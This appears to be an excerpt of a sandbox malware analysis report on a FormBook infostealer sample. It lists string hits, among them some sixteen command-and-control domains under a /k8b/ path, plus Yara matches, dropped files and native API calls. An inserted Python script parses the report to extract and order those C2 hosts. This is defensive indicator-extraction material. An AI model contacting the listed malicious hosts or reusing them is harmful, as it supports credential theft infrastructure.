          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.glowtey.com/k8b/www.citestaccnt1598634983.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.glowtey.comReferer:
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.localille.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.localille.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.localille.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.messi-and-ronaldo.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.messi-and-ronaldo.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.messi-and-ronaldo.com/k8b/www.westhillsterracepdx.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.messi-and-ronaldo.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.pbuckleyprojects.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.pbuckleyprojects.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.pbuckleyprojects.com/k8b/www.localille.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.pbuckleyprojects.comReferer:
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.sasvisioninternational.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.sasvisioninternational.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.sasvisioninternational.com/k8b/www.exceptionalhospitals.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.sasvisioninternational.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.sfheli.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.sfheli.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.sfheli.com/k8b/www.pbuckleyprojects.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.sfheli.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.therbalfoodinv.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.therbalfoodinv.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.therbalfoodinv.com/k8b/www.messi-and-ronaldo.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.therbalfoodinv.comReferer:
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.trophemus-treasure-hunters.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.trophemus-treasure-hunters.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.trophemus-treasure-hunters.com/k8b/www.etkensigorta.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.trophemus-treasure-hunters.comReferer:
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.westhillsterracepdx.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.westhillsterracepdx.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.westhillsterracepdx.com/k8b/www.ytalmorales.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.westhillsterracepdx.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.wintersmooncandleco.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.wintersmooncandleco.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.wintersmooncandleco.com/k8b/www.glowtey.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.wintersmooncandleco.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.ytalmorales.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.ytalmorales.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.ytalmorales.com/k8b/www.7sat.asia
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.ytalmorales.comReferer:
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.200696225.0000000001289000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
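The string hits above mix two things found in the injected explorer.exe: font-vendor licence URLs from region 000000000BA46000 (normal explorer.exe content) and the FormBook server list from region 0000000008072000, where every host carries the same short directory (/k8b/) and several strings run a host's URL straight into the next hostname ("www.A/k8b/www.B"), which is how the list is laid out in memory. The script below is an added example, not part of the sandbox report or of any FormBook tooling: it parses report lines of this form, picks the directory shared by the most hosts as the panel path (so a single "/cn/" hit from a font vendor is not mistaken for C2), and uses the fused URL+hostname strings to recover the order of the hosts in the dump. Reading that concatenation as memory adjacency is an interpretation, and the 404 seen above from www.messi-and-ronaldo.com does not on its own clear that domain, so every listed host is kept. The input is a constructed subset of the report's own lines; nothing is fetched.

```python
"""Extract FormBook server indicators from Joe Sandbox 'String found in
binary or memory' lines.  Added example, not from the report.  The sample
lines are a subset of this report's hits, rebuilt in the report's fused
extraction form, so the script runs offline."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

CFG_DUMP = "explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp"
FONT_DUMP = "explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp"
DROPPER = "pZTgBSxb0oe9deC.exe, 00000000.00000002.200696225.0000000001289000.00000004.00000020.sdmp"


def _hit(src: str, value: str) -> str:
    # Same shape as the raw report: dump name and field label run together.
    return f"Source: {src}String found in binary or memory: {value}"


SAMPLE_LINES = [  # constructed subset of the report's string hits
    _hit(FONT_DUMP, "http://www.fontbureau.com/designers"),
    _hit(FONT_DUMP, "http://www.founder.com.cn/cn/bThe"),
    _hit(DROPPER, "http://go.microsoft."),
    _hit(CFG_DUMP, "http://www.therbalfoodinv.com"),
    _hit(CFG_DUMP, "http://www.therbalfoodinv.com/k8b/"),
    _hit(CFG_DUMP, "http://www.therbalfoodinv.com/k8b/www.messi-and-ronaldo.com"),
    _hit(CFG_DUMP, "http://www.therbalfoodinv.comReferer:"),
    _hit(CFG_DUMP, "http://www.messi-and-ronaldo.com/k8b/"),
    _hit(CFG_DUMP, "http://www.messi-and-ronaldo.com/k8b/www.westhillsterracepdx.com"),
    _hit(CFG_DUMP, "http://www.westhillsterracepdx.com/k8b/"),
    _hit(CFG_DUMP, "http://www.westhillsterracepdx.com/k8b/www.ytalmorales.com"),
    _hit(CFG_DUMP, "http://www.ytalmorales.com/k8b/"),
    _hit(CFG_DUMP, "http://www.ytalmorales.com/k8b/www.7sat.asia"),
    _hit(CFG_DUMP, "http://www.ytalmorales.comReferer:"),
]

SOURCE_RE = re.compile(r"Source:\s*(?P<proc>[^,]+),\s*(?P<dump>\S+?\.sdmp)")
VALUE_RE = re.compile(r"String found in binary or memory:\s*(?P<val>\S+)")
# host followed by exactly one short directory: the shape of the panel URLs
PANEL_RE = re.compile(r"^http://(?P<host>[^/]+)/(?P<dir>[A-Za-z0-9]{2,6})/(?P<tail>.*)$")
HOST_RE = re.compile(r"^www\.[A-Za-z0-9.-]+$")


@dataclass
class C2Extract:
    panel_dir: str                      # directory shared by the hosts ("k8b" here)
    dumps: List[str]                    # memory regions the server strings came from
    domains_in_memory_order: List[str]  # recovered from the fused URL+hostname strings
    other_urls: List[str] = field(default_factory=list)  # URLs not tied to a listed host


def parse_hits(lines):
    """(process, dump, value) per 'String found' line; accepts the fused
    '...sdmpString found...' form and a separated '...sdmp | String found...' form."""
    for line in lines:
        s, v = SOURCE_RE.search(line), VALUE_RE.search(line)
        if s and v:
            yield s["proc"].strip(), s["dump"], v["val"]


def extract_formbook_c2(lines, process="explorer.exe") -> Optional[C2Extract]:
    urls = []
    for proc, dump, val in parse_hits(lines):
        if proc != process or not val.startswith("http://"):
            continue
        if val.endswith("Referer:"):        # next string in memory fused onto the URL
            val = val[: -len("Referer:")]
        urls.append((dump, val))
    # The panel directory is the one shared by the most distinct hosts.
    by_dir = {}
    for _, u in urls:
        m = PANEL_RE.match(u)
        if m:
            by_dir.setdefault(m["dir"], set()).add(m["host"])
    if not by_dir:
        return None
    panel_dir = max(by_dir, key=lambda d: len(by_dir[d]))
    if len(by_dir[panel_dir]) < 2:          # one host under a short dir is not a list
        return None
    c2_hosts = by_dir[panel_dir]
    # "www.A/<dir>/www.B": B's hostname follows A's URL in the dump.
    successor, dumps = {}, set()
    for dump, u in urls:
        m = PANEL_RE.match(u)
        if m and m["dir"] == panel_dir:
            dumps.add(dump)
            if HOST_RE.match(m["tail"]):
                successor[m["host"]] = m["tail"]
    heads = sorted(c2_hosts - set(successor.values()))  # hosts nothing points at
    ordered, seen = [], set()
    for h in heads + sorted(c2_hosts):
        while h and h not in seen:
            ordered.append(h)
            seen.add(h)
            h = successor.get(h)
    other = [u for _, u in urls if not any(u.startswith(f"http://{h}") for h in ordered)]
    return C2Extract(panel_dir, sorted(dumps), ordered, other)


if __name__ == "__main__":
    r = extract_formbook_c2(SAMPLE_LINES)
    print(f"panel dir: /{r.panel_dir}/  (from {', '.join(r.dumps)})")
    for i, d in enumerate(r.domains_in_memory_order):
        print(f"  [{i:02d}] {d}")
    print("non-C2 URLs:", r.other_urls)
```

Run against the full list above, the walk starts at www.therbalfoodinv.com (the only host no fused string points at) and ends at www.localille.com (the only host with no "/k8b/www." continuation), which gives the sixteen hosts in dump order; the subset embedded here reproduces the first five steps of that walk.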

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.202381231.0000000004158000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.243339890.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\help.exe | Dropped file: C:\Users\user\AppData\Roaming\O9541UQ2\O95logri.ini
          Source: C:\Windows\SysWOW64\help.exe | Dropped file: C:\Users\user\AppData\Roaming\O9541UQ2\O95logrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.202381231.0000000004158000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.202381231.0000000004158000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.243339890.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.243339890.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_0138BB4E NtQuerySystemInformation
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_0138BB13 NtQuerySystemInformation
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00419CA0 NtCreateFile
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00419D50 NtReadFile
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00419DD0 NtClose
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00419E80 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00419C9B NtCreateFile
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00419DCA NtClose
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00419E7B NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C99A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C98F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9540 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C95D0 NtClose, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C97A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C96E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9950 NtQueueApcThread
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C99D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014CB040 NtSuspendThread
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9820 NtEnumerateKey
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C98A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9B00 NtSetValueKey
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014CA3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9A10 NtQuerySection
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9560 NtWriteFile
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014CAD30 NtSetContextThread
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C95F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9760 NtOpenProcess
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014CA770 NtOpenThread
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9770 NtSetInformationFile
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014CA710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9FE0 NtCreateMutant
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9650 NtQueryValueKey
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C9610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014C96D0 NtCreateKey
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D636C0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D6DAE0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D60E08
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D62FC8
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D623B8
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D60B00
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D61309
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D6401B
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D66690
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D66680
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D66E50
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D66E60
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D6A268
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D6CF88
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D6CBB8
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D62F28
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D67CBB
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D66C59
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D67048
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D65C48
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D66C68
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D6A808
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D6C430
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D65C3B
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D67039
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D671DB
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D6DDF0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D6AD90
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D6B580
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D6E560
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D66919
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00401030
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0041DBAE
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0041DD50
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00409DDA
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00402D87
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00402D90
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00409E20
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0041CEF3
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0041DFA9
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0148F900
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014A4120
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_01541002
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_015528EC
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0149B090
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014B20A0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_015520A8
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_01552B28
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0154DBD2
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014BEBB0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_015522AE
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_01551D55
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_01552D07
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_01480D20
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_015525DD
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0149D5E0
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014B2581
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0154D466
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0149841F
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_01551FF1
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0154D616
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014A6E30
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_01552EF7
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: String function: 0148B150 appears 35 times
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.204782995.0000000006220000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.204782995.0000000006220000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.204568741.0000000006120000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.200696225.0000000001289000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenamemscorwks.dllT vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.204192717.0000000005780000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameB2B.exe4 vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.200968047.0000000002DA0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameWinRar.dll. vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000000.186675537.0000000000A7E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameA1F.exe, vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.203689491.0000000005300000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs pZTgBSxb0oe9deC.exe
